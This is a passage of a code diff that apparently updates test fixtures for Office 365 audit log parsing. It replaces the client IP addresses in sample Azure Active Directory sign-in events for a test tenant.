\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -730,10 +730,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:49", "ExtendedProperties": [ { 
@@ -783,7 +783,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -801,10 +801,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:02", "ExtendedProperties": [ { 
@@ -854,7 +854,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -872,10 +872,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:08", "ExtendedProperties": [ { 
@@ -925,7 +925,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -943,10 +943,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:27", "ExtendedProperties": [ { 
@@ -996,7 +996,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1014,10 +1014,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:33:54", "ExtendedProperties": [ { 
@@ -1067,7 +1067,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1085,10 +1085,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:12", "ExtendedProperties": [ { 
@@ -1138,7 +1138,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1156,10 +1156,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:35", "ExtendedProperties": [ { 
